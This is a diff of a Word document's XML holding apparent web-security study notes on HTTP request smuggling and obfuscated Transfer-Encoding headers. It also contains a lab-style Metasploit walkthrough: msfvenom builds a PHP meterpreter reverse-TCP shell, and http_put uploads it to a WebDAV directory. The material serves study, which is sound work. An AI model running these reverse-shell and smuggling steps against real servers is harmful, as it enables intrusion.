+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>symbolising</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the headers used in the attack. These are: CL:CL CL:TE TE:TE and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>TE:CL.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The CL stands for the header value Content-Length and the TE value stands for the header Transfer-Encoding</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15218,7 +17201,19 @@
             <w:szCs w:val="24"/>
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:rPr>
-          <w:t>Cross-Site Scr</w:t>
+          <w:t xml:space="preserve">Cross-Site </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cstheme="minorHAnsi"/>
+            <w:color w:val="auto"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>Scr</w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -15240,7 +17235,19 @@
             <w:szCs w:val="24"/>
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:rPr>
-          <w:t>ting (XSS)</w:t>
+          <w:t>ting</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:cstheme="minorHAnsi"/>
+            <w:color w:val="auto"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> (XSS)</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -15258,7 +17265,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users</w:t>
+        <w:t xml:space="preserve">bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>users</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15267,7 +17283,17 @@
           <w:szCs w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">  and more</w:t>
+        <w:t xml:space="preserve">  and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> more</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15959,7 +17985,21 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Content-Type: application/json; charset=utf-8</w:t>
+        <w:t>Content-Type: application/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>; charset=utf-8</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16152,20 +18192,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding: xchunked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+        <w:t xml:space="preserve">Transfer-Encoding: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
@@ -16173,8 +18202,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding : chunked</w:t>
-      </w:r>
+        <w:t>xchunked</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
@@ -16194,14 +18224,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding: chunked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+        <w:t>Transfer-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
@@ -16209,20 +18234,9 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding: x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
+        <w:t>Encoding :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="HTMLCode"/>
@@ -16230,7 +18244,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding:[tab]chunked</w:t>
+        <w:t xml:space="preserve"> chunked</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16251,13 +18265,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>[space]Transfer-Encoding: chunked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:br/>
+        <w:t>Transfer-Encoding: chunked</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16272,7 +18280,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>X: X[\n]Transfer-Encoding: chunked</w:t>
+        <w:t>Transfer-Encoding: x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16293,7 +18301,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding</w:t>
+        <w:t>Transfer-Encoding:[tab]chunked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16308,25 +18322,19 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>: chunked</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
+        <w:t>[space]Transfer-Encoding: chunked</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve">Each of these techniques involves a subtle departure from the HTTP specification. Real-world code that implements a protocol specification rarely adheres to it with absolute precision, and it is common for different implementations to tolerate different variations from the specification. To uncover a TE.TE vulnerability, it is necessary to find some variation of the </w:t>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16335,31 +18343,19 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Transfer-Encoding</w:t>
+        <w:t>X: X[\n]Transfer-Encoding: chunked</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t xml:space="preserve"> header such that only one of the front-end or back-end servers processes it, while the other server ignores it. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
+        <w:br/>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Depending on whether it is the front-end or the back-end server that can be induced not to process the obfuscated </w:t>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16374,6 +18370,81 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>: chunked</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Each of these techniques involves a subtle departure from the HTTP specification. Real-world code that implements a protocol specification rarely adheres to it with absolute precision, and it is common for different implementations to tolerate different variations from the specification. To uncover a TE.TE vulnerability, it is necessary to find some variation of the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Transfer-Encoding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> header such that only one of the front-end or back-end servers processes it, while the other server ignores it. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Depending on whether it is the front-end or the back-end server that can be induced not to process the obfuscated </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Transfer-Encoding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
         <w:t xml:space="preserve"> header, the remainder of the attack will take the same form as for the CL.TE or TE.CL vulnerabilities already described.</w:t>
       </w:r>
     </w:p>
@@ -16466,8 +18537,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
-      </w:r>
+        <w:t>Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16620,8 +18701,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
-      </w:r>
+        <w:t>Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16791,7 +18882,21 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>Content-Type: application/json; charset=utf-8</w:t>
+        <w:t>Content-Type: application/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>; charset=utf-8</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16938,7 +19043,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>HTTP request smuggling vulnerabilities arise in situations where a front-end server forwards mult</w:t>
+        <w:t xml:space="preserve">HTTP request smuggling vulnerabilities arise in situations where a front-end server forwards </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mult</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16954,7 +19068,16 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>le requests to a back-end server over the same network connection, and the protocol used for the back-end connections carries the risk that the two servers disagree about the boundaries between requests. Some generic ways to prevent HTTP request smuggling vulnerabilities arising are as follows:</w:t>
+        <w:t>le</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> requests to a back-end server over the same network connection, and the protocol used for the back-end connections carries the risk that the two servers disagree about the boundaries between requests. Some generic ways to prevent HTTP request smuggling vulnerabilities arising are as follows:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17383,8 +19506,72 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw &gt;shell.php</w:t>
-      </w:r>
+        <w:t xml:space="preserve">msfvenom -p </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>lhost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=192.168.1.105 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>lport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>=4444 -f raw &gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17420,7 +19607,29 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (we will assume that we will upload in dav/ directory)</w:t>
+        <w:t xml:space="preserve"> (we will assume that we will upload in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/ directory)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17464,14 +19673,34 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt; use auxiliary/scanner/http/http_put</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt; use auxiliary/scanner/http/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17487,13 +19716,59 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; set rhosts 192.168.1.103</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) &gt; set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>rhosts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.103</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17510,13 +19785,59 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; set payload php/meterpreter/reverse_tcp</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) &gt; set payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/meterpreter/reverse_tcp</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17533,13 +19854,59 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>msf&gt;auxiliary (http_put) &gt; set path /dav/</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;auxiliary (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http_put</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>) &gt; set path /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dav</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
